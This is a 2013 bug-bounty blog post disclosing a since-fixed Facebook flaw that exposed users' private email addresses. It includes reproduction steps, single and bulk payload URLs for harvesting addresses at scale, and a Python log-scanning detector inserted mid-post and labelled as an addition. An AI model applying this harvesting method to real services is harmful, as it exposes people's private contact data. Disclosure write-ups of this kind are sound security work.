Saturday, July 20, 2013

Hi. In this post, I'll be talking about how I disclosed the private primary email address of any Facebook account, with no user interaction. Enjoy.

This bug was reported to the Facebook Security Team and fixed immediately.

Last month, I found a vulnerability in the Facebook Developer Application Roles page which allowed me to disclose the primary Facebook email address even if the victim had set the email address privacy to "Only Me".

Steps to Reproduce

1. Grab profile links of all Facebook users from the Facebook People Directory, i.e. http://www.facebook.com/directory/people/
2. Collect the numerical Facebook ID for each profile from the Facebook Graph API, i.e. http://graph.facebook.com/sdfsdfsdafd.sdfdsafsdfds where the extracted user ID is 100006240120652
3. Block the victim's Facebook account
4. Create a Facebook Application -> Go to Settings -> Developer Roles
5. The final payload for this vulnerability looks like this:

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID

Furthermore, you can obtain multiple email addresses by adding more parameters:

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID1&unverified_groups[2][0]=VICTIM_UID2&unverified_groups[3][0]=VICTIM_UID3&unverified_groups[4][0]=VICTIM_UID4&unverified_groups[5][0]=VICTIM_UID5&unverified_groups[6][0]=VICTIM_UID6&unverified_groups[7][0]=VICTIM_UID7&unverified_groups[8][0]=VICTIM_UID8&unverified_groups[9][0]=VICTIM_UID9&unverified_groups[10][0]=VICTIM_UID10

and so forth...
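A defender-side check for the request pattern described above, added here as an example (not code from the original post or from Facebook): it scans request-log entries for roles-page URLs whose `unverified_groups[n][m]` parameters name user IDs the server never recorded as pending for that application. The log tuple format, the `PENDING_INVITES` table, the function names and all sample IDs are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path of the roles page from the post; captures APPLICATION_ID.
ROLES_PATH = re.compile(r"^/apps/([^/]+)/roles/?$")
# Parameter shape from the post: unverified_groups[<n>][<m>]=<UID>
GROUP_PARAM = re.compile(r"^unverified_groups\[\d+\]\[\d+\]$")


def requested_uids(url):
    """Return (app_id, [uids]) for a roles-page URL, or None for any other URL."""
    parts = urlsplit(url)
    match = ROLES_PATH.match(parts.path)
    if match is None:
        return None
    # parse_qsl percent-decodes keys, so %5B1%5D%5B0%5D is caught as well as [1][0].
    uids = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if GROUP_PARAM.match(k)]
    return match.group(1), uids


def flag_requests(log_entries, pending_invites):
    """Report roles-page requests naming user IDs the server never recorded
    as pending for that application (assumed server-side state)."""
    alerts = []
    for requester, url in log_entries:
        parsed = requested_uids(url)
        if parsed is None:
            continue
        app_id, uids = parsed
        unknown = sorted(set(uids) - pending_invites.get(app_id, set()))
        if unknown:
            alerts.append({"requester": requester, "app_id": app_id,
                           "unknown_uids": unknown})
    return alerts


# Constructed sample data: (requester, requested URL) pairs and pending invites.
HOST = "https://developers.facebook.com"
SAMPLE_LOG = [
    ("dev_a", HOST + "/apps/111/roles"),
    ("dev_a", HOST + "/apps/111/roles?unverified_groups[1][0]=9001"),
    ("dev_b", HOST + "/apps/222/roles?unverified_groups[1][0]=9002"
              "&unverified_groups%5B2%5D%5B0%5D=9003"),
    ("dev_b", HOST + "/apps/222/settings?unverified_groups[1][0]=9004"),
]
PENDING_INVITES = {"111": {"9001"}}

if __name__ == "__main__":
    for alert in flag_requests(SAMPLE_LOG, PENDING_INVITES):
        print(alert)
```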

Dumping Like a Boss ;)

I had just reported this issue, and one hour later the Facebook Security Team responded to my initial report.

LoL! ;)

At exactly 8:26 AM the vulnerability was finally fixed.

Final fix: 5 hours after initial report

Facebook was pretty fast to address this issue and resolved it within hours. The Facebook Security team awarded this bug $4500.

Facebook WhiteHat Card, baby!

I appreciate the opportunity to preserve my skills and gain some more experience. Thank you Facebook security team.